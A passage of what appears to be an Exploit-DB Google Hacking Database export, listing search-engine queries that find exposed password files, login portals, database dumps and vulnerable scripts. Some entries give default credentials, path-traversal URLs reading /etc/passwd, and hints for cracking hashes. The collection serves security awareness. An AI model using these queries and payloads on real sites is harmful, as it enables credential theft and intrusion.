while at the same time exposing their pages to Google.. way to go guys.." }, { "signatureReferenceNumber": "411", "link": "https://www.exploit-db.com/ghdb/411/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Apass+pass+intext%3Auserid&btnG=Search", "shortDescription": "filetype:pass pass intext:userid", "textualDescription": "Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline." }, { "signatureReferenceNumber": "412", "link": "https://www.exploit-db.com/ghdb/412/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3A%2Fcgi-bin%2Fsqwebmail%3Fnoframes%3D1&btnG=Search", "shortDescription": "inurl:/cgi-bin/sqwebmail?noframes=1", "textualDescription": "sQWebmail login portals." }, { "signatureReferenceNumber": "413", "link": "https://www.exploit-db.com/ghdb/413/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Aini+ServUDaemon&btnG=Search", "shortDescription": "filetype:ini ServUDaemon", "textualDescription": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more." }, { "signatureReferenceNumber": "414", "link": "https://www.exploit-db.com/ghdb/414/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3Acomersus_message.asp", "shortDescription": "inurl:comersus_message.asp", "textualDescription": "About Comercus: \"Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers.\"Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/ This search finds the XSS vulnerable file comersus_message.asp?message= ..No version info is included with the search. Not all results are vulnerable." }, { "signatureReferenceNumber": "415", "link": "https://www.exploit-db.com/ghdb/415/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22teamspeak+server-administration", "shortDescription": "intitle:\"teamspeak server-administration", "textualDescription": "TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal." }, { "signatureReferenceNumber": "416", "link": "https://www.exploit-db.com/ghdb/416/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&q=ext%3Apl+inurl%3Acgi+intitle%3A%22FormMail+*%22++-%22*Referrer%22+-%22*+Denied%22+-sourceforge+-error+-cvs+-input", "shortDescription": "ext:pl inurl:cgi intitle:\"FormMail *\" -\"*Referrer\" -\"* Denied\" -sourceforge -error -cvs -input", "textualDescription": "FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early version didn' have a referer check. New versions could be misconfigured. Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.http://www.securityfocus.com/bid/3954/discussion/" }, { "signatureReferenceNumber": "417", "link": "https://www.exploit-db.com/ghdb/417/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=%28inurl%3A%22robot.txt%22+%7C+inurl%3A%22robots.txt%22+%29+intext%3Adisallow+filetype%3Atxt", "shortDescription": "(inurl:\"robot.txt\" | inurl:\"robots.txt\" ) intext:disallow filetype:txt", "textualDescription": "Webmasters wanting to exclude search engine robots from certain parts of their site often choose the use of a robot.txt file on the root of the server. This file basicly tells the bot which directories are supposed to be off-limits.An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. Google helps the attacker by allowing a search for the \"disallow\" keyword." }, { "signatureReferenceNumber": "418", "link": "https://www.exploit-db.com/ghdb/418/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:%22Session+Start+*+*+*+*:*:*+*%22+filetype:log&num=100", "shortDescription": "intext:\"Session Start * * * *:*:* *\" filetype:log", "textualDescription": "These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun." }, { "signatureReferenceNumber": "419", "link": "https://www.exploit-db.com/ghdb/419/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22WebSTAR+Mail+-+Please+Log+In%22", "shortDescription": "\"WebSTAR Mail - Please Log In\"", "textualDescription": "@stake, Inc. advisory: \"4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X. There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources.\"See also: http://www.securityfocus.com/archive/1/368778" }, { "signatureReferenceNumber": "420", "link": "https://www.exploit-db.com/ghdb/420/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=filetype%3Acfg+login+%22LoginServer%3D%22", "shortDescription": "Ultima Online loginservers", "textualDescription": "This one finds login servers for the Ultima Online game." }, { "signatureReferenceNumber": "421", "link": "https://www.exploit-db.com/ghdb/421/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Anuke+filetype%3Asql&btnG=Search", "shortDescription": "inurl:nuke filetype:sql", "textualDescription": "This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. These database dumps contain usernames and (sometimes) encrypted passwords for users of the system." }, { "signatureReferenceNumber": "422", "link": "https://www.exploit-db.com/ghdb/422/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=50&q=intitle%3A%22please+login%22+%22your+password+is+*%22", "shortDescription": "intitle:\"please login\" \"your password is *\"", "textualDescription": "These administrators were friendly enough to give hints about the password." }, { "signatureReferenceNumber": "423", "link": "https://www.exploit-db.com/ghdb/423/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=mail+filetype%3Acsv+-site%3Agov+intext%3Aname", "shortDescription": "mail filetype:csv -site:gov intext:name", "textualDescription": "CSV Exported mail (user) names and such." }, { "signatureReferenceNumber": "424", "link": "https://www.exploit-db.com/ghdb/424/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+-site%3Agov+inurl%3Acontact&btnG=Search", "shortDescription": "filetype:xls -site:gov inurl:contact", "textualDescription": "Microsoft Excel sheets containing contact information." }, { "signatureReferenceNumber": "425", "link": "https://www.exploit-db.com/ghdb/425/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intext:%22Warning:+*+am+able+*+write+**+configuration+file%22+%22includes/configure.php%22+-Forums&num=100&hl=en&lr=&ie=UTF-8&safe=off&start=0&sa=N", "shortDescription": "intext:\"Warning: * am able * write ** configuration file\" \"includes/configure.php\" -Forums", "textualDescription": "OsCommerce has some security issues, including the following warning message: \"Warning: I am able to write to the configuration file\". Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there." }, { "signatureReferenceNumber": "426", "link": "https://www.exploit-db.com/ghdb/426/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Acgi-bin%2Fultimatebb.cgi%3Fubb%3Dlogin&btnG=Search", "shortDescription": "inurl:cgi-bin/ultimatebb.cgi?ubb=login", "textualDescription": "These are login pages for Infopop's message board UBB.classic. For the UBB.threads you can use this search This next search finds all UBB pages with the infopop image and a link to the developers.http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1" }, { "signatureReferenceNumber": "427", "link": "https://www.exploit-db.com/ghdb/427/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl%3A%2Fdb%2Fmain.mdb", "shortDescription": "inurl:/db/main.mdb", "textualDescription": "ASP-Nuke database file containing passwords.This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location." }, { "signatureReferenceNumber": "428", "link": "https://www.exploit-db.com/ghdb/428/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3Aasp+inurl%3Apathto.asp", "shortDescription": "ext:asp inurl:pathto.asp", "textualDescription": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This searches pathto.asp files and allows an attacker to know the exact installed path of the software.Examples:The path to your Site is -- g:\\0E5\\goldenstateeng.xxx\\webThe path to your Site is -- D:\\inetpub\\wwwroot\\01xx738\\mc10s9izz" }, { "signatureReferenceNumber": "429", "link": "https://www.exploit-db.com/ghdb/429/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=ext%3Acgi+inurl%3Aubb6_test.cgi", "shortDescription": "ext:cgi inurl:ubb6_test", "textualDescription": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This is the UBB6 Permissions & Paths Diagnostic Script.Example:UBB Version \t6.1.0.3 Perl Version \t5.006 Server Type \tApache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b check path: \t1. \tcheck permission to write new files in this directory2. \tcheck for the 'required' files in both the CGI and this directory3. \tcheck my read/write permissions on all the variables files4. \tcheck my absolute paths in general settings if available \tversion 2.1 \t\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2001 Infopop Corporation All Rights Reserved" }, { "signatureReferenceNumber": "430", "link": "https://www.exploit-db.com/ghdb/430/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=%22this+proxy+is+working+fine!%22+%22enter+*%22+%22URL***%22+*+visit&num=100&filter=0", "shortDescription": "\"this proxy is working fine!\" \"enter *\" \"URL***\" * visit", "textualDescription": "These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy. The experts comment on this is there are much better solutions for surfing anonymously." }, { "signatureReferenceNumber": "431", "link": "https://www.exploit-db.com/ghdb/431/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Abak+inurl%3A%22htaccess%7Cpasswd%7Cshadow%7Chtusers%22&filter=0", "shortDescription": "filetype:bak inurl:\"htaccess|passwd|shadow|htusers\"", "textualDescription": "This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences." }, { "signatureReferenceNumber": "432", "link": "https://www.exploit-db.com/ghdb/432/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?safe=off&q=%22http%3A%2F%2F*%3A*%40www%22+bob%3Abob&num=100", "shortDescription": "\"http://*:*@www\" domainname", "textualDescription": "This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net\"http://*:*@www\" bangbus or \"http://*:*@www\"bangbusAnother way is by just typing\"http://bob:bob@www\"" }, { "signatureReferenceNumber": "433", "link": "https://www.exploit-db.com/ghdb/433/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Alog+%22PHP+Parse+error%22+%7C+%22PHP+Warning%22+%7C+%22PHP+Error%22", "shortDescription": "filetype:log \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"", "textualDescription": "This search will show an attacker some PHP error logs wich may contain information on wich an attack can be based." }, { "signatureReferenceNumber": "434", "link": "https://www.exploit-db.com/ghdb/434/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22powered+by+CuteNews%22+%222003..2005+CutePHP%22&btnG=Search", "shortDescription": "\"powered by CuteNews\" \"2003..2005 CutePHP\"", "textualDescription": "This finds sites powered by various CuteNews versions. An attacker use this list and search the online advisories for vulnerabilities. For example: \"CuteNews HTML Injection Vulnerability Via Commentaries\", Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)" }, { "signatureReferenceNumber": "435", "link": "https://www.exploit-db.com/ghdb/435/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intext%3A%22404+Object+Not+Found%22+Microsoft-IIS%2F5.0", "shortDescription": "intext:\"404 Object Not Found\" Microsoft-IIS/5.0", "textualDescription": "This search finds IIS 5.0 error pages = IIS 5.0 Server" }, { "signatureReferenceNumber": "436", "link": "https://www.exploit-db.com/ghdb/436/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+oekakibbs+&btnG=Search", "shortDescription": "filetype:conf oekakibbs", "textualDescription": "Oekakibss is a japanese anime creation application. The config file tells an attacker the encrypted password." }, { "signatureReferenceNumber": "437", "link": "https://www.exploit-db.com/ghdb/437/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&&q=Novell+NetWare+intext%3A%22netware+management+portal+version%22", "shortDescription": "Novell NetWare intext:\"netware management portal version\"", "textualDescription": "Netware servers ( v5 and up ) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.After the Google results are displayed, an attacker wil go to the company base web url and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password." }, { "signatureReferenceNumber": "438", "link": "https://www.exploit-db.com/ghdb/438/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22dispatch.php%3Fatknodetype%22+%7C++inurl:class.atkdateattribute.js.php&num=100&filter=0", "shortDescription": "Achievo webbased project management", "textualDescription": "Achievo is a free web-based project management tool for business-environments. Achievo's is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite. More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html" }, { "signatureReferenceNumber": "439", "link": "https://www.exploit-db.com/ghdb/439/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22PHP+Explorer%22+ext%3Aphp+%28inurl%3Aphpexplorer.php+%7C++inurl%3Alist.php+%7C+inurl%3Abrowse.php%29", "shortDescription": "intitle:\"PHP Explorer\" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)", "textualDescription": "This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them)." }, { "signatureReferenceNumber": "440", "link": "https://www.exploit-db.com/ghdb/440/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22ftp%3A%2F%2F%22+%22www.eastgame.net%22+&btnG=Google+Search", "shortDescription": "\"ftp://\" \"www.eastgame.net\"", "textualDescription": "Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.\"thankyou4share\" !" }, { "signatureReferenceNumber": "441", "link": "https://www.exploit-db.com/ghdb/441/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22ITS+System+Information%22+%22Please+log+on+to+the+SAP+System%22", "shortDescription": "intitle:\"ITS System Information\" \"Please log on to the SAP System\"", "textualDescription": "Frontend for SAP Internet Transaction Server webgui service." }, { "signatureReferenceNumber": "442", "link": "https://www.exploit-db.com/ghdb/442/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=Login+(%22Powered+by+Jetbox+One+CMS+%E2%84%A2%22+%7C+%22Powered+by+Jetstream+%C2%A9+*%22)&num=100&hl=en&lr=&ie=UTF-8&safe=off&filter=0", "shortDescription": "Login (\"Powered by Jetbox One CMS \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2\" | \"Powered by Jetstream \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 *\")", "textualDescription": "Jetbox is a content management systems (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF wich I think is overrated, but I will mention here:http://www.securityfocus.com/bid/10858/discussion/The file holding the password is called: \"http://.../includes/general_settings.inc.php\"It does come with default passwords and that is allways a security risk. The administration is available via /admin/Username: admin, Password: admin1 ." }, { "signatureReferenceNumber": "443", "link": "https://www.exploit-db.com/ghdb/443/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=LeapFTP+intitle%3A%22index.of.%2F%22+sites.ini+modified&btnG=Search", "shortDescription": "LeapFTP intitle:\"index.of./\" sites.ini modified", "textualDescription": "The LeapFTP client configuration file \"sites.ini\" holds the login credentials for those sites in plain text. The passwords seems to be encrypted." }, { "signatureReferenceNumber": "444", "link": "https://www.exploit-db.com/ghdb/444/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3ALogin+1%261+Webmailer&btnG=Google+Search", "shortDescription": "intitle:Login * Webmailer", "textualDescription": "1&1 Webmail login portals. This is made by a german company called Internet United active in the hosting providers area. They have a server login product wich can be found by GooglingThis is all not very exiting as there have been no vulnerabilities reported on this software yet." }, { "signatureReferenceNumber": "445", "link": "https://www.exploit-db.com/ghdb/445/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A%22gs%2Fadminlogin.aspx%22", "shortDescription": "inurl:\"gs/adminlogin.aspx\"", "textualDescription": "GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example: option value=\"E:\\GRADESPEED\\DRHARMONWKELLEYELEMENTARY\\|Dr H. W K. E.|101\">Dr ..." }, { "signatureReferenceNumber": "446", "link": "https://www.exploit-db.com/ghdb/446/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=%22phone++*+*+*%22+%22address+*%22+%22e-mail%22+intitle:%22curriculum+vitae%22", "shortDescription": "\"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"", "textualDescription": "This search gives hounderd of existing curriculum vitae with names and adress. An attacker could steal identity if there is an SSN in the document." }, { "signatureReferenceNumber": "447", "link": "https://www.exploit-db.com/ghdb/447/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:Novell+WebAccess&ie=UTF-8&oe=UTF-8intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", "shortDescription": "intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", "textualDescription": "search to show online Novell Groupwise web access portals." }, { "signatureReferenceNumber": "448", "link": "https://www.exploit-db.com/ghdb/448/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?num=100&q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22", "shortDescription": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "textualDescription": "search for phpMyAdmin installations that are configured to run the MySQL database with root priviledges." }, { "signatureReferenceNumber": "449", "link": "https://www.exploit-db.com/ghdb/449/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+Gallery+v1.4.4%22", "shortDescription": "\"Powered by Gallery v1.4.4\"", "textualDescription": "http://www.securityfocus.com/bid/10968/discussion/\"A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. \"" }, { "signatureReferenceNumber": "450", "link": "https://www.exploit-db.com/ghdb/450/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3AQDF+QDF", "shortDescription": "Quicken data files", "textualDescription": "The QDATA.QDF file (found sometimes in zipped \"QDATA\" archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc. This search has only a couple hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy and suggests to backup your data online." }, { "signatureReferenceNumber": "451", "link": "https://www.exploit-db.com/ghdb/451/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=filetype%3Aini+wcx_ftp", "shortDescription": "filetype:ini wcx_ftp", "textualDescription": "This searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future." }, { "signatureReferenceNumber": "452", "link": "https://www.exploit-db.com/ghdb/452/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?&q=%224images+Administration+Control+Panel%22", "shortDescription": "4images Administration Control Panel", "textualDescription": "4images Gallery - 4images is a web-based image gallery management system. The 4images administration control panel let you easily modify your galleries." }, { "signatureReferenceNumber": "453", "link": "https://www.exploit-db.com/ghdb/453/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=intitle%3Aindex.of+%2FAlbumArt_&btnG=Google-Suche&meta=", "shortDescription": "intitle:index.of /AlbumArt_", "textualDescription": "Directories containing commercial music.AlbumArt_{.*}.jpg are download/create by MS-Windows Media Player in music directory." }, { "signatureReferenceNumber": "454", "link": "https://www.exploit-db.com/ghdb/454/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Arobpoll.cgi+filetype%3Acgi&btnG=Search", "shortDescription": "inurl:robpoll.cgi filetype:cgi", "textualDescription": "robpoll.cgi is used to administrate polls.The default password used for adding polls is 'robpoll'. All of the results should look something like this: \"http://www.example.com/robpoll.cgi?start\". An attacker may change robpoll.cgi pointing to admin like this: \"http://www.example.com/robpoll.cgi?admin\"." }, { "signatureReferenceNumber": "455", "link": "https://www.exploit-db.com/ghdb/455/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=%28+filetype%3Amail+%7C+filetype%3Aeml+%7C+filetype%3Ambox+%7C+filetype%3Ambx+%29+intext%3Apassword%7Csubject+&btnG=Google-Suche&meta=", "shortDescription": "( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject", "textualDescription": "storing emails in your webtree isnt a good idea.with this search google will show files containing emails like mail,eml,mbox or mbx with the keywords\"password\" or \"subject\" in the mail data." }, { "signatureReferenceNumber": "456", "link": "https://www.exploit-db.com/ghdb/456/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&q=filetype%3Aqbb+qbb", "shortDescription": "filetype:qbb qbb", "textualDescription": "This search will show QuickBooks Bakup Files. Quickbook is financial accounting software so storing these files in a webtree is not a smart idea." }, { "signatureReferenceNumber": "457", "link": "https://www.exploit-db.com/ghdb/457/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=filetype%3Abkf+bkf&meta=", "shortDescription": "filetype:bkf bkf", "textualDescription": "This search will show backupfiles for xp/2000 machines.Of course these files could contain nearly everything, depending on the user selection and they can also be password protected." }, { "signatureReferenceNumber": "458", "link": "https://www.exploit-db.com/ghdb/458/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=inurl%3A%22plog%2Fregister.php%22", "shortDescription": "inurl:\"plog/register.php\"", "textualDescription": "pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites running it. The installation documents clearly warn about removing files after installation for security purposes:\"If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php.\"This search finds that register.php form of course :)Below is some more general information about pLog.Vendor site: hxxp://www.plogworld.org/Admin portals http://sitename/plog/admin.phpInstallation wizard: http://sitename/plog/wizard.phpConfig file (mysql db pass): http://sitename/plog/config/config.properties.phpTemp files: http://sitename/plog/tmp/Gallery files: http://sitename/plog/gallery/Blog search engine: http://www.plogworld.org/ploogle/" }, { "signatureReferenceNumber": "459", "link": "https://www.exploit-db.com/ghdb/459/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=link%3Ahttp%3A%2F%2Fwww.toastforums.com%2F&btnG=Google+Search", "shortDescription": "link:http://www.toastforums.com/", "textualDescription": "Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem is in the install documentation (quoting):-- start quote --2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name. -- end quote --This search finds sites running Toast Forum by using the LINK: operator. Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table \"tstdb_Member\". It looks like this:\"ID\" \"FName\" \"LName\" \"Username\" \"Password\" \"Email\" \"HideEmail\" \"ICQ\" \"Homepage\" \"Signature\" \"IP\" \"Skin\" \"IncludeSignature\" \"NotifyDefault\" \"PostCount\" \"LastLoginDate\" \"LastPostDate\"Passwords are encrypted with the RC4 algoritm, so an attacker would find cracking them is (more) difficult (than usual)." }, { "signatureReferenceNumber": "460", "link": "https://www.exploit-db.com/ghdb/460/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=databasetype.+Code+:+80004005.+Error+Description+:&num=100&hl=en&lr=&ie=UTF-8&safe=off&start=0&sa=N", "shortDescription": "snitz! forums db path error", "textualDescription": "snitz forums uses a microsoft access databases for storage and the default name is \"Snitz_forums_2000.mdb\". The installation recommends changing both the name and the path. If only one is changed this database error occurs. An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads." }, { "signatureReferenceNumber": "461", "link": "https://www.exploit-db.com/ghdb/461/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+Ikonboard+3.1.1%22", "shortDescription": "\"Powered by Ikonboard 3.1.1\"", "textualDescription": "IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.htmlThe bug was fixed in 3.1.2." }, { "signatureReferenceNumber": "462", "link": "https://www.exploit-db.com/ghdb/462/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3Asnitz_forums_2000.mdb", "shortDescription": "inurl:snitz_forums_2000.mdb", "textualDescription": "The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says: \"it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name.\"Of course, we know readme's are for lamers.. right admins ?[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERSMEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]1,1,\"adminadmin\",\"58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e\",\"yourmail@server.com\",\" \",\" \",\"\",\"\",1,1,1,3,\" \",\" \",\" \",\"20030918120147\",2,\"20030918120207\",\"20030918120224\",\"Forum Admin\",\"10.xx.xx.72\",0,0,1,\"000.000.000.000\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\" \",\" \",\"\",\"\",\" \",\"\",\"\",\"\",\"\",1(data xx'd at some points) The password hash value is a SHA256 encoded string (with no salting). Every attacker knows they can be broken with a dictionary attack using a very simpel perl or C program.http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt" }, { "signatureReferenceNumber": "463", "link": "https://www.exploit-db.com/ghdb/463/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&q=inurl%3A%2Fcgi-bin%2Findex.cgi+inurl%3Atopics+inurl%3Aviewcat%3D+%2Bintext%3A%22WebAPP%22+-site%3Aweb-app.org", "shortDescription": "WebAPP directory traversal", "textualDescription": "WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCredits goes to PhTeam for discovering this vulnerability." }, { "signatureReferenceNumber": "464", "link": "https://www.exploit-db.com/ghdb/464/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype%3Ardp+rdp", "shortDescription": "filetype:rdp rdp", "textualDescription": "These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another windows computer using the RDP protocols." }, { "signatureReferenceNumber": "465", "link": "https://www.exploit-db.com/ghdb/465/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype%3Areg+%22Terminal+Server+Client%22", "shortDescription": "filetype:reg \"Terminal Server Client\"", "textualDescription": "These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses." }, { "signatureReferenceNumber": "466", "link": "https://www.exploit-db.com/ghdb/466/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=inurl:%22nph-proxy.cgi%22+%22Start+browsing+through+this+CGI-based+proxy%22&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"", "textualDescription": "Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.Web crackers are a distinct breed, and many do not comfort well with the draconian measures that many other crackers take, such as port and service scanning, the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with the only viable option to come in contact with a large number of proxies being to use public proxy lists. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.Luckily google gives them another option, if they are smart enough to find it.CGI-proxy ( 